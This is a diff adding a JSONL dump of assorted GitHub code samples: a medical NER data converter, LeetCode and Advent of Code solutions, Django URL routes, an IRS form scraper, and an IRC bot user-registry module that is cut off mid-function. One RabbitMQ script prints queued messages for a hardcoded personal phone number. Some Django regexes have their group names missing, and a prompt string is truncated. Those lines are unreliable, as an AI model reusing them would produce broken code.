diff --git "a/4888.jsonl" "b/4888.jsonl" new file mode 100644--- /dev/null +++ "b/4888.jsonl" @@ -0,0 +1,1321 @@ +{"seq_id":"72321914292","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: transfer_data.py\n# Author: lhy\n# Date: 18-12-24\n\nimport os\nfrom collections import Counter\n\nclass TransferData:\n def __init__(self):\n cur = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n self.label_dict = {\n '检查和检验': 'CHECK',\n '症状和体征': 'SIGNS',\n '疾病和诊断': 'DISEASE',\n '治疗': 'TREATMENT',\n '身体部位': 'BODY'}\n\n self.cate_dict ={\n 'O':0,\n 'TREATMENT-I': 1,\n 'TREATMENT-B': 2,\n 'BODY-B': 3,\n 'BODY-I': 4,\n 'SIGNS-I': 5,\n 'SIGNS-B': 6,\n 'CHECK-B': 7,\n 'CHECK-I': 8,\n 'DISEASE-I': 9,\n 'DISEASE-B': 10\n }\n self.origin_path = os.path.join(cur, 'data_origin')\n self.train_filepath = os.path.join(cur, 'train.txt')\n return\n\n\n def transfer(self):\n f = open(self.train_filepath, 'w+')\n count = 0\n for root,dirs,files in os.walk(self.origin_path):\n for file in files:\n filepath = os.path.join(root, file)\n if 'original' not in filepath:\n continue\n label_filepath = filepath.replace('.txtoriginal','')\n print(filepath, '\\t\\t', label_filepath)\n content = open(filepath).read().strip()\n res_dict = {}\n for line in open(label_filepath):\n res = line.strip().split('\t')\n start = int(res[1])\n end = int(res[2])\n label = res[3]\n label_id = self.label_dict.get(label)\n for i in range(start, end+1):\n if i == start:\n label_cate = label_id + '-B'\n else:\n label_cate = label_id + '-I'\n res_dict[i] = label_cate\n\n for indx, char in enumerate(content):\n char_label = res_dict.get(indx, 'O')\n print(char, char_label)\n f.write(char + '\\t' + char_label + '\\n')\n f.close()\n return\n\n\n\nif __name__ == '__main__':\n handler = TransferData()\n train_datas = handler.transfer()","repo_name":"liuhuanyong/MedicalNamedEntityRecognition","sub_path":"transfer_data.py","file_name":"transfer_data.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":397,"dataset":"github-code","pt":"21"} +{"seq_id":"16647302032","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n\n res = []\n self.dfs(nums,0,[], res)\n return res\n def dfs(self,nums, start, tmp, res):\n res.append(tmp[:]) #copy\n for i in range(start, len(nums)):\n tmp.append(nums[i])\n self.dfs(nums, i+1, tmp, res)\n tmp.pop()\n\n ","repo_name":"ny215/LeetcodeExercise","sub_path":"Backtracking/78. Subsets.py","file_name":"78. 
Subsets.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9768087197","text":"#!/usr/bin/env python\nimport argparse\nimport pprint\n\nparser = argparse.ArgumentParser(description = \"find words in file1 and not in file2\")\nparser.add_argument('file1', type=argparse.FileType('r'))\nparser.add_argument('file2', type=argparse.FileType('r'))\nparser.add_argument('-o','--out', type=argparse.FileType('w'), required = True)\nargs = parser.parse_args()\n\nfile1 = set([ record for record in args.file1.read().split() if not record.startswith(\"sample\") ])\nfile2 = set([ record for record in args.file2.read().split() if not record.startswith(\"sample\") ])\ndifference = file1 - file2\npprint.pprint(difference)\n\nwith open(\"PEP_missing\",\"w\") as fp:\n fp.writelines([ record+\"\\n\" for record in difference])\n","repo_name":"PiscatorX/misc-scripts","sub_path":"get_diff.py","file_name":"get_diff.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14405480414","text":"from aifc import Error\n\nimport pika, sys, os,re,json\nfrom pika import channel\nresult = None\n\ndef resive():\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='rmq.esphere.local'))\n channel = connection.channel()\n channel.queue_declare(queue='notif_lkk_11.12',durable=True)\n\n def callback(ch, method, properties, body):\n global result\n result=body.decode()\n\n try:\n prepare_date=(body.decode())\n # print (type(prepare_date))\n if '79214199530' in prepare_date:\n\n json_date= json.loads(prepare_date)\n print(json_date['message']['text'])\n else:\n pass\n except (Exception, Error) as error:\n print(' нет номера '+ str(error))\n channel.basic_consume('notif_lkk_11.12', on_message_callback=callback ,auto_ack=True)\n channel.start_consuming()\nresive()\n","repo_name":"Ilasasds/sms","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853096741","text":"from django.conf.urls.defaults import *\nfrom django.core.exceptions import ImproperlyConfigured\nfrom corehq.apps.reports.util import get_installed_custom_modules\nfrom corehq.apps.reports.dispatcher import (ProjectReportDispatcher, \n CustomProjectReportDispatcher, BasicReportDispatcher)\nimport logging\n\ndodoma_reports = patterns('corehq.apps.reports.dodoma',\n url('^household_verification_json$', 'household_verification_json'),\n url('^household_verification/$', 'household_verification'),\n)\n\n_phonelog_context = {\n 'report': {\n 'name': \"Device Logs\",\n }\n}\n\ncustom_report_urls = patterns('',\n CustomProjectReportDispatcher.url_pattern(),\n)\n\nphonelog_reports = patterns('',\n url(r'^$', 'phonelog.views.devices', name=\"phonelog_devices\", kwargs={\n 'template': 'reports/phonelog/devicelist.html',\n 'context': _phonelog_context\n }),\n url(r'^(?P[\\w\\-]+)/$', 'phonelog.views.device_log', name=\"device_log\", kwargs={\n 'template': 'reports/phonelog/devicelogs.html',\n 'context': _phonelog_context\n }),\n url(r'^(?P[\\w\\-]+)/raw/$', 'phonelog.views.device_log_raw', name=\"device_log_raw\", kwargs={\n 'template': 'reports/phonelog/devicelogs_raw.html',\n 'context': _phonelog_context\n }),\n)\n\nurlpatterns = patterns('corehq.apps.reports.views',\n url(r'^$', \"default\", name=\"reports_home\"),\n 
url(r'^saved/', \"saved_reports\", name=\"saved_reports\"),\n url(r'^saved_reports', 'old_saved_reports'),\n\n url(r'^case_data/(?P[\\w\\-]+)/(?P[\\w\\-:]+)/$', 'case_form_data', name=\"case_form_data\"),\n url(r'^case_data/(?P[\\w\\-]+)/$', 'case_details', name=\"case_details\"),\n url(r'^case_data/(?P[\\w\\-]+)/view/xml/$', 'case_xml', name=\"single_case_xml\"),\n\n # Download and view form data\n url(r'^form_data/(?P[\\w\\-:]+)/$', 'form_data', name='render_form_data'),\n url(r'^form_data/(?P[\\w\\-:]+)/download/$', 'download_form', name='download_form'),\n url(r'^form_data/(?P[\\w\\-:]+)/download-attachment/$',\n 'download_attachment', name='download_attachment'),\n url(r'^form_data/(?P[\\w\\-:]+)/archive/$', 'archive_form', name='archive_form'),\n url(r'^form_data/(?P[\\w\\-:]+)/unarchive/$', 'unarchive_form', name='unarchive_form'),\n\n # Custom Hook for Dodoma TODO should this be here?\n url(r'^dodoma/', include(dodoma_reports)),\n\n\n # Create and Manage Custom Exports\n url(r\"^export/$\", 'export_data'),\n\n # Download Exports\n # todo should eventually be moved to corehq.apps.export\n ## Custom\n url(r\"^export/custom/(?P[\\w\\-]+)/download/$\", 'export_default_or_custom_data', name=\"export_custom_data\"),\n ## Default\n url(r\"^export/default/download/$\", \"export_default_or_custom_data\", name=\"export_default_data\"),\n ## Bulk\n url(r\"^export/bulk/download/$\", \"export_default_or_custom_data\", name=\"export_bulk_download\", kwargs=dict(bulk_export=True)),\n ## saved\n url(r\"^export/saved/download/(?P[\\w\\-]+)/$\", \"hq_download_saved_export\", name=\"hq_download_saved_export\"),\n\n # once off email\n url(r\"^email_onceoff/(?P[\\w_]+)/$\", 'email_report'),\n url(r\"^custom/email_onceoff/(?P[\\w_]+)/$\", 'email_report',\n kwargs=dict(report_type=CustomProjectReportDispatcher.prefix)),\n\n # Saved reports\n url(r\"^configs$\", 'add_config', name='add_report_config'),\n url(r\"^configs/(?P[\\w-]+)$\", 'delete_config',\n name='delete_report_config'),\n\n # Scheduled reports\n url(r'^scheduled_reports/(?P[\\w-]+)?$',\n 'edit_scheduled_report', name=\"edit_scheduled_report\"),\n url(r'^scheduled_report/(?P[\\w-]+)/delete$',\n 'delete_scheduled_report', name='delete_scheduled_report'),\n url(r'^send_test_scheduled_report/(?P[\\w-]+)/$',\n 'send_test_scheduled_report', name='send_test_scheduled_report'),\n url(r'^view_scheduled_report/(?P[\\w_]+)/$',\n 'view_scheduled_report', name='view_scheduled_report'),\n\n # Internal Use\n url(r\"^export/forms/all/$\", 'export_all_form_metadata', name=\"export_all_form_metadata\"),\n url(r\"^export/forms/all/async/$\", 'export_all_form_metadata_async', name=\"export_all_form_metadata_async\"),\n url(r'^download/cases/$', 'download_cases', name='download_cases'),\n\n # TODO should this even be here?\n url(r'^phonelog/', include(phonelog_reports)),\n\n url(r'^custom/', include(custom_report_urls)),\n ProjectReportDispatcher.url_pattern(),\n)\n\nreport_urls = patterns('',\n BasicReportDispatcher.url_pattern(),\n)\n\nfor module in get_installed_custom_modules():\n module_name = module.__name__.split('.')[-1]\n try:\n custom_report_urls += patterns('',\n (r\"^%s/\" % module_name, include('{0}.urls'.format(module.__name__))),\n )\n except ImproperlyConfigured:\n logging.info(\"Module %s does not provide urls\" % 
module_name)","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34976367714","text":"import requests\nimport lxml.html as lh\nimport json\nimport os\n\nprint(\"Enter:
...\" )\ninput_ = input().upper()\ntokens = input_.split(' ')\noutput = []\n\nfor token in tokens:\n form_number = 'Form ' + token\n url = \"https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value=\" + token + \"&isDescending=false\"\n\n #gets raw HTML data from url\n page = requests.get(url)\n\n #parse raw HTML\n page_content = lh.fromstring(page.content)\n\n xpathstring = '//tr[td[a[text() = \"Form ' + token + '\"]]]'\n data_list = page_content.xpath(xpathstring)\n\n #find form_title of form\n if len(data_list) > 0: \n form_title = data_list[0].find_class('MiddleCellSpacer')[0].text.lstrip().rstrip()\n else:\n form_title = 'NA'\n\n #find max_year of form \n if len(data_list) > 0: \n max_year = data_list[0].find_class('EndCellSpacer')[0].text.lstrip().rstrip()\n else:\n max_year = 'NA'\n \n #find min_year of form\n if len(data_list) > 0: \n min_year = data_list[len(data_list)-1].find_class('EndCellSpacer')[0].text.lstrip().rstrip()\n else:\n min_year = 'NA'\n\n data = {\n 'form_number': form_number, \n 'form_title': form_title , \n 'min_year': min_year, \n 'max_year': max_year\n }\n\n output.append(data)\n\nprint(output)\njson.dumps(output)","repo_name":"erinnaw/IRS_form_retriever","sub_path":"part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40794939759","text":"from timeit import default_timer as timer\n\ndef get_input():\n with open(\"./day16/16.in\", \"r\") as f:\n fields, own, others = f.read().split(\"\\n\\n\")\n fields = [[f.split(' or ')for f in field.split(': ')]\n for field in fields.split(\"\\n\")]\n rules = {}\n for item in fields:\n a = set()\n for val in item[1]:\n val = val.split('-')\n a |= set(range(int(val[0]), int(val[1])+1))\n rules[item[0][0]] = a \n own = list(map(int, own.splitlines()[1].split(',')))\n others = [list(map(int, other.split(','))) for other in others.splitlines()[1:]]\n return (rules, own, others)\n\n\ndef p1(data):\n res = 0\n # Aid with part2\n valid = []\n for ticket in data[2]:\n # Aid with part2\n invalid = False\n for value in ticket:\n if not any([value in field for field in data[0].values()]):\n invalid = True\n res += value\n # Aid with part2\n if not invalid:\n valid.append(ticket)\n return res, valid\n\n\ndef p2(data, tickets):\n rules = data[0]\n own = data[1]\n # Dictionary of what field relates to what column\n potentialRulesIndex = {key: [] for key in rules.keys()}\n rulesIndex = {key: None for key in rules.keys()}\n # Packs data up by column\n tickets = list(zip(*tickets))\n for values in tickets:\n # Go throigh and find what each 'column' could represent based on where it would be valid for all.\n for cond, nums in rules.items():\n if all(val in nums for val in values):\n potentialRulesIndex[cond].append(values)\n\n # Assumed always column with just one option\n while [None] * len(potentialRulesIndex.values()) != list(potentialRulesIndex.values()):\n for cond, poss in potentialRulesIndex.items():\n removed = None\n if poss != None:\n # Only option that the column can be\n if len(poss) == 1:\n rulesIndex[cond] = poss[0]\n potentialRulesIndex[cond] = None\n removed = poss\n # If found column with 1 item, remove all referces to it from other potential rules.\n if removed != None :\n for c in potentialRulesIndex.keys():\n if potentialRulesIndex[c] != None and removed[0] in potentialRulesIndex[c]:\n 
potentialRulesIndex[c].remove(removed[0])\n\n ans = 1\n for key, val in rulesIndex.items():\n index = tickets.index(val)\n if \"departure\" in key:\n ans *= own[index]\n return ans \n\n\nprint(\"Day 16: Ticket Translation\")\ndata = get_input()\np1start = timer()\np1, tickets = p1(data)\np1end = timer()\nprint(f\"Part 1: {p1} in {p1end-p1start}s.\")\n\np2start = timer()\np2 = p2(data, tickets)\np2end = timer()\nprint(f\"Part 2: {p2} in {p2end-p2start}s.\")\n","repo_name":"jkershaw2000/aoc","sub_path":"2020/day16/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4306795309","text":"import pymongo\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.test\nstu = db.stu\nstu.insert({'name':'nandi','age':54})\nstu.update({'name':'nandi'},{'$set':{'gender':1}})\ns1 = stu.find()\nfor s in s1:\n print(s)\nprint(stu.count())","repo_name":"guan-zi/homework","sub_path":"第四章数据库/mongodb/mongotest1.py","file_name":"mongotest1.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72101022133","text":"import csv\nfrom operator import itemgetter\nreader = csv.reader(open(\"imdbData/title.episode.tsv\"), delimiter=\"\\t\")\n\nf = open('episode.sorted.tsv', 'w')\n\nfor line in sorted(reader, key=itemgetter(0)):\n\n str_to_write = line[0]+'\\t'+line[1]+'\\t'+line[2]+'\\t'+line[3]+'\\n'\n print(str_to_write)\n f.write(str_to_write)\n\nf.close()\n ","repo_name":"leobouts/Merge_join_database_queries","sub_path":"sort_tsv_by_column.py","file_name":"sort_tsv_by_column.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42041418598","text":"from __future__ import annotations\n\nimport fnmatch\nimport time\nimport re\nfrom typing import Callable, Optional, Iterable, TYPE_CHECKING\n\nfrom src.context import IRCContext, Features, NotLoggedIn, lower\nfrom src import config, db\nfrom src.events import Event, EventListener\nfrom src.debug import CheckedDict, CheckedSet, handle_error\nfrom src.match import Match\n\nif TYPE_CHECKING:\n from src.containers import UserSet, UserDict, UserList\n from src.gamestate import GameState\n from src.channels import Channel\n\n__all__ = [\"Bot\", \"predicate\", \"get\", \"add\", \"users\", \"disconnected\", \"complete_match\",\n \"parse_rawnick\", \"parse_rawnick_as_dict\", \"User\", \"FakeUser\", \"BotUser\"]\n\nBot: BotUser = None # type: ignore[assignment]\n\n_users: CheckedSet[User] = CheckedSet(\"users._users\")\n_ghosts: CheckedSet[User] = CheckedSet(\"users._ghosts\")\n_pending_account_updates: CheckedDict[User, CheckedDict[str, Callable]] = CheckedDict(\"users._pending_account_updates\")\n\n_arg_msg = \"(user={0:for_tb_verbose}, allow_bot={1})\"\n\n# This is used to tell if this is a fake nick or not. If this function\n# returns a true value, then it's a fake nick. 
This is useful for\n# testing, where we might want everyone to be fake nicks.\npredicate = re.compile(r\"^[0-9]+$\").search\n\ndef get(nick=None, ident=None, host=None, account=None, *, allow_multiple=False, allow_none=False, allow_bot=False, allow_ghosts=False, update=False):\n \"\"\"Return the matching user(s) from the user list.\n\n :param nick: Nickname or raw nick (nick!ident@host) to match.\n If a raw nick is passed, the `ident` and `host` args must be None.\n :param ident: Ident to match.\n :param host: Host to match.\n :param account: Account to match.\n :param allow_multiple: Allow multiple matches, returning a list (even if only one match).\n :param allow_none: Allow no matches, returning None if nothing found. Otherwise raises KeyError.\n :param allow_bot: Allow the BotUser to be matched and returned.\n :param allow_ghosts: Allow disconnected users to be matched and returned.\n :param update: If a raw nick was passed and case-insensitively matches an existing user, the existing\n user will be updated to match the case of the raw nick. This works around some odd behavior in some\n ircds with respect to case-sensitivity. This should only be True if a raw nick is passed and\n if the raw nick comes from a trusted source (i.e. generated by the ircd itself)\n :returns: The matched user(s), if any.\n :raises KeyError: If no users match and allow_none is False.\n :raises ValueError: If multiple users match and allow_multiple is False.\n \"\"\"\n\n have_raw_nick = False\n raw_nick = None\n if ident is None and host is None and nick is not None:\n raw_nick = nick\n nick, ident, host = parse_rawnick(nick)\n if ident is not None and host is not None:\n have_raw_nick = True\n\n sentinel = object()\n\n temp = User(sentinel, nick, ident, host, account)\n if temp.client is not sentinel: # actual client\n return [temp] if allow_multiple else temp\n\n potential = []\n users = set(_users)\n if not allow_ghosts:\n users.difference_update(_ghosts)\n if allow_bot:\n try:\n users.add(Bot)\n except ValueError:\n pass # Bot may not be hashable in early init; this is fine and User.__new__ handles this gracefully\n\n for user in users:\n if update and have_raw_nick:\n # check for variations in case; this is the *only* time when users.get() can be case-insensitive\n if user.lower().partial_match(temp.lower()):\n # changing rawnick could swap user out, so we need to fetch the new instance\n # (with update=False to avoid recursion)\n user.rawnick = raw_nick\n return get(raw_nick, allow_multiple=allow_multiple, allow_none=allow_none, allow_bot=allow_bot, allow_ghosts=allow_ghosts, update=False)\n elif user.partial_match(temp):\n potential.append(user)\n\n if allow_multiple:\n return potential\n\n if len(potential) == 1:\n return potential[0]\n\n if len(potential) > 1:\n raise ValueError(\"More than one user matches: \" +\n _arg_msg.format(temp, allow_bot))\n\n if not allow_none:\n raise KeyError(_arg_msg.format(temp, allow_bot))\n\n return None\n\ndef add(cli, *, nick, ident=None, host=None, account=NotLoggedIn):\n \"\"\"Create a new user, add it to the user list and return it.\n\n This function takes up to 4 keyword-only arguments (and one positional\n argument, cli): nick, ident, host, and account.\n With the exception of the first one, any parameter can be omitted.\n\n \"\"\"\n\n if ident is None and host is None and nick is not None:\n nick, ident, host = parse_rawnick(nick)\n\n cls = User\n if predicate(nick):\n cls = FakeUser\n\n new = cls(cli, nick, ident, host, account)\n\n if new is not Bot:\n try:\n 
hash(new)\n except ValueError:\n pass\n else:\n _users.add(new)\n\n return new\n\ndef users():\n \"\"\"Iterate over the users in the registry.\"\"\"\n yield from _users\n\ndef disconnected():\n \"\"\"Iterate over the users who are in-game but disconnected.\"\"\"\n yield from _ghosts\n\ndef complete_match(pattern: str, scope: Optional[Iterable[User]] = None):\n \"\"\" Find a user or users who match the given pattern.\n\n :param pattern: Pattern to match on. The format is \"[nick][:account]\",\n with [] denoting an optional field. Exact matches are tried, and then\n prefix matches (stripping special characters as needed). If both a nick\n and an account are specified, both must match.\n :param Optional[Iterable[User]] scope: Users to match pattern against. If None,\n search against all users.\n :returns: A Match object describing whether or not the match succeeded.\n :rtype: Match[User]\n \"\"\"\n if scope is None:\n scope = _users\n matches: list[User] = []\n nick_search, _, acct_search = lower(pattern).partition(\":\")\n if not nick_search and not acct_search:\n return Match([])\n\n direct_match = False\n for user in scope:\n nick = lower(user.nick)\n stripped_nick = nick.lstrip(\"[{\\\\^_`|}]\")\n if nick_search:\n if nick == nick_search:\n if not direct_match:\n matches.clear()\n direct_match = True\n matches.append(user)\n elif not direct_match and (nick.startswith(nick_search) or stripped_nick.startswith(nick_search)):\n matches.append(user)\n else:\n matches.append(user)\n\n if acct_search:\n scope = list(matches)\n matches.clear()\n direct_match = False\n for user in scope:\n if not user.account:\n continue # fakes don't have accounts, so this search won't be able to find them\n acct = lower(user.account)\n stripped_acct = acct.lstrip(\"[{\\\\^_`|}]\")\n if acct == acct_search:\n if not direct_match:\n matches.clear()\n direct_match = True\n matches.append(user)\n elif not direct_match and (acct.startswith(acct_search) or stripped_acct.startswith(acct_search)):\n matches.append(user)\n\n return Match(matches)\n\n_raw_nick_pattern = re.compile(r\"^(?P.+?)(?:!(?P.+?)@(?P.+))?$\")\n\ndef parse_rawnick(rawnick, *, default=None):\n \"\"\"Return a tuple of (nick, ident, host) from rawnick.\"\"\"\n\n return _raw_nick_pattern.search(rawnick).groups(default)\n\ndef parse_rawnick_as_dict(rawnick, *, default=None):\n \"\"\"Return a dict of {\"nick\": nick, \"ident\": ident, \"host\": host}.\"\"\"\n\n return _raw_nick_pattern.search(rawnick).groupdict(default)\n\ndef _cleanup_user(evt, var: GameState, user: User):\n \"\"\"Removes a user from our global tracking set once it has left all channels.\"\"\"\n # if user is in-game, keep them around so that other players can act on them\n # and so that they can return to the village. 
If they aren't in game, erase\n # all memory of them from the bot.\n if var and var.in_game and user in var.players:\n user.disconnected = True\n else:\n user.disconnected = False\n _users.discard(user)\n\ndef _reset(evt, var):\n \"\"\"Cleans up users that left during game during game end.\"\"\"\n for user in _ghosts:\n if not user.channels:\n _users.discard(user)\n _ghosts.clear()\n\ndef _update_account(evt, user):\n \"\"\"Updates account data of a user for networks which don't support certain features.\"\"\"\n if evt.params.old in _pending_account_updates:\n updates = list(_pending_account_updates[evt.params.old].items())\n del _pending_account_updates[evt.params.old]\n for command, callback in updates:\n # handle_error swallows exceptions so that a callback raising an exception\n # does not prevent other registered callbacks from running\n handle_error(callback)(user)\n\n# Can't use @event_listener decorator since src/decorators.py imports us\n# (meaning decorator isn't defined at the point in time we are run)\nEventListener(_cleanup_user).install(\"cleanup_user\")\nEventListener(_reset).install(\"reset\")\nEventListener(_update_account).install(\"who_end\")\n\nclass User(IRCContext):\n\n is_user = True\n\n _ident: str\n _host: str\n _account: str\n\n channels: CheckedDict[Channel, set[str]]\n timestamp: float\n account_timestamp: float\n\n sets: list[UserSet]\n lists: list[UserList]\n dict_keys: list[UserDict]\n dict_values: list[UserDict]\n\n def __init__(self, cli, nick, ident, host, account):\n \"\"\"Make linters happy.\"\"\"\n super().__init__(nick, cli)\n\n def __new__(cls, cli, nick, ident, host, account):\n self: User = super().__new__(cls)\n self.__init__(cli, nick, ident, host, account)\n if account in (\"0\", \"*\"):\n account = NotLoggedIn\n\n self._ident = ident\n self._host = host\n self._account = account\n self.channels = CheckedDict(\"users.User.channels\")\n self.timestamp = time.time()\n self.sets = []\n self.lists = []\n self.dict_keys = []\n self.dict_values = []\n self.account_timestamp = time.time()\n\n if Bot is not None and nick is not None and Bot.nick.rstrip(\"_\") == nick.rstrip(\"_\") and None in {Bot.ident, Bot.host}:\n # Bot ident/host being None means that this user isn't hashable, so it cannot be in any containers\n # which store by hash. 
As such, mutating the properties is safe.\n self = Bot\n self.name = nick\n if ident is not None:\n self._ident = ident\n if host is not None:\n self._host = host\n self._account = account\n self.timestamp = time.time()\n self.account_timestamp = time.time()\n\n elif (cls.__name__ == \"User\" and Bot is not None\n and Bot.nick == nick and ident is not None and host is not None\n and Bot.ident != ident and Bot.host == host and Bot.account == account):\n # Messages sent in early init may give us an incorrect ident (such as because we're waiting for\n # a response from identd, or there is some *line which overrides the ident for the bot).\n # Since Bot.ident attempts to create a new BotUser, we guard against recursion by only following this\n # branch if we're constructing a top-level User object (such as via users.get)\n Bot.ident = ident\n self = Bot\n\n elif nick is not None and ident is not None and host is not None and account is not None:\n users = set(_users)\n users.add(Bot)\n if self in users:\n for user in users:\n if self == user:\n self = user\n break\n\n else:\n # This takes a different code path because of slightly different\n # conditions; in the above case, the ident and host are both known,\n # and so the instance is hashable. Being hashable, it can be checked\n # for set containment, and exactly one instance in that set will be\n # equal (since the hash is based off of the ident and host, and the\n # comparisons check for all those two attributes among others, two\n # instances cannot possibly be equal while having a different hash).\n #\n # In this case, however, at least the ident or the host is missing,\n # and so the hash cannot be calculated. This means that two instances\n # may compare equal and hash to different values (since only non-None\n # attributes are compared), so we need to run through the entire set\n # no matter what to make sure that one - and only one - instance in\n # the set compares equal with the new one. We can't know in advance\n # whether or not there is an instance that compares equal to this one\n # in the set, or if multiple instances are going to compare equal to\n # this one.\n #\n # The code paths, while similar in functionality, fulfill two distinct\n # purposes; the first path is usually for when new users are created\n # from a WHO reply, with all the information. This is the most common\n # case. This path, on the other hand, is for the less common cases,\n # where only the nick is known (for example, a KICK target), and where\n # the user may or may not already exist. In that case, it's easier and\n # better to just try to create a new user, which this code can then\n # implicitly replace with the equivalent user (instead of trying to get\n # an existing user or creating a new one if that fails). 
This is also\n # used as a short-circuit for get().\n #\n # Please don't merge these two code paths for the sake of simplicity,\n # and instead opt for the sake of clarity that this separation provides.\n\n potential = None\n users = set(_users)\n if Bot is not None:\n users.add(Bot)\n for user in users:\n if self.partial_match(user):\n if potential is None:\n potential = user\n else:\n break # too many possibilities\n else:\n if potential is not None:\n self = potential\n\n return self\n\n def __str__(self):\n return \"{self.__class__.__name__}: {self.nick}!{self.ident}@{self.host}:{self.account}\".format(self=self)\n\n def __repr__(self):\n return \"{self.__class__.__name__}({self.nick!r}, {self.ident!r}, {self.host!r}, {self.account!r}, {self.channels!r})\".format(self=self)\n\n def __format__(self, format_spec):\n if format_spec == \"@\":\n return \"\\u0002{0}\\u0002\".format(self.name)\n elif format_spec in (\"for_tb\", \"for_tb_verbose\"):\n user_data_level = config.Main.get(\"telemetry.errors.user_data_level\")\n if user_data_level == 0:\n return \"{self.__class__.__name__}({0:x})\".format(id(self), self=self)\n elif user_data_level == 1 or format_spec == \"for_tb\":\n return \"{self.__class__.__name__}({self.nick!r}, {0:x})\".format(id(self), self=self)\n else:\n return repr(self)\n return super().__format__(format_spec)\n\n def __hash__(self):\n # check intentionally omits account: account may be None for normal operation for any user.\n if self.nick is None or self.ident is None or self.host is None:\n raise ValueError(\"cannot hash a User with no nick, ident, or host\")\n return hash((self.nick, self.ident, self.host, self.account))\n\n def __eq__(self, other):\n return (isinstance(other, User)\n and self.nick == other.nick\n and self.ident == other.ident\n and self.host == other.host\n and self.account == other.account)\n\n def __lt__(self, other):\n if not isinstance(other, User):\n return NotImplemented\n\n self_comp = self.name if self.is_fake else self.account\n other_comp = other.name if other.is_fake else other.account\n return self_comp < other_comp\n\n def partial_match(self, other):\n \"\"\"Test if our non-None properties match the non-None properties on the other object.\n\n :param other: Object to compare with\n :returns: True if `other` is a User object and the non-None properties match our non-None properties.\n \"\"\"\n val = self._compare(other, __class__, \"nick\", \"ident\", \"host\", \"account\")\n if val is NotImplemented:\n raise TypeError(f\"{other.__class__.__name__} is not a subclass of {__class__.__name__}\")\n return val\n\n # User objects are not copyable - this is a deliberate design decision\n # Therefore, those two functions here only return the object itself\n # Even if we tried to create new instances, the logic in __new__ would\n # just fetch back the same instance, so we save ourselves the trouble\n\n def __copy__(self):\n return self\n\n def __deepcopy__(self, memo):\n return self\n\n def swap(self, new: User, *, same_user=False):\n \"\"\"Swap yourself out with the new user everywhere.\n\n :param new: New user to replace current one with.\n :param same_user: If True, indicates `new` is the same user instance as `self`, just\n with updated values. 
This performs some additional work to ensure that the hand-off\n does not lose any data.\n \"\"\"\n if self is new:\n return # as far as the caller is aware, we've swapped\n\n _ghosts.discard(self)\n if not self.channels or same_user:\n _users.discard(self) # Goodbye, my old friend\n\n for lst in self.lists[:]:\n while self in lst:\n lst[lst.index(self)] = new\n\n for s in self.sets[:]:\n s.remove(self)\n s.add(new)\n\n for dk in self.dict_keys[:]:\n dk[new] = dk.pop(self)\n\n for dv in self.dict_values[:]:\n for key in dv:\n if dv[key] is self:\n dv[key] = new\n\n if same_user:\n global Bot\n new.channels = self.channels\n for channel in self.channels:\n channel.users.discard(self)\n channel.users.add(new)\n for mode in Features[\"PREFIX\"].values():\n if self in channel.modes.get(mode, ()):\n channel.modes[mode].discard(self)\n channel.modes[mode].add(self)\n\n if not isinstance(new, BotUser):\n _users.add(new)\n\n if self is Bot:\n assert isinstance(new, BotUser)\n Bot = new\n\n # It is the containers' responsibility to properly remove themselves from the users\n # So if any list is non-empty, something went terribly wrong\n assert not self.lists and not self.sets and not self.dict_keys and not self.dict_values\n\n def lower(self):\n temp = type(self)(self.client, lower(self.nick), lower(self.ident), lower(self.host, casemapping=\"ascii\"), lower(self.account))\n if temp is not self: # If everything is already lowercase, we'll get back the same instance\n temp.channels = self.channels\n temp.ref = self.ref or self\n return temp\n\n def is_owner(self):\n if self.is_fake:\n return False\n\n # FIXME: needs to be transport aware\n acls = config.Main.get(\"access.entries\")\n accounts = set(e[\"account\"] for e in acls if e[\"template\"] == \"owner\")\n\n if self.account and self.account in accounts:\n return True\n\n return False\n\n def is_admin(self):\n if self.is_fake:\n return False\n\n flags = db.FLAGS[self.account]\n\n if \"F\" not in flags:\n try:\n # FIXME: needs to be transport aware\n acls = config.Main.get(\"access.entries\")\n accounts = set(e[\"account\"] for e in acls if e[\"template\"] in (\"admin\", \"owner\"))\n if self.account and self.account in accounts:\n return True\n except AttributeError:\n pass\n\n return self.is_owner()\n\n return True\n\n def get_send_type(self, *, is_notice=False, is_privmsg=False):\n if is_privmsg:\n return \"PRIVMSG\"\n if is_notice:\n return \"NOTICE\"\n if self.prefers_notice():\n return \"NOTICE\"\n return \"PRIVMSG\"\n\n def match_hostmask(self, hostmask):\n \"\"\"Match n!u@h, u@h, or just h by itself.\"\"\"\n nick, ident, host = re.match(\"(?:(?:(.*?)!)?(.*?)@)?(.*)\", hostmask).groups(\"\")\n temp = self.lower()\n\n return ((not nick or fnmatch.fnmatch(temp.nick, lower(nick))) and\n (not ident or fnmatch.fnmatch(temp.ident, lower(ident))) and\n fnmatch.fnmatch(temp.host, 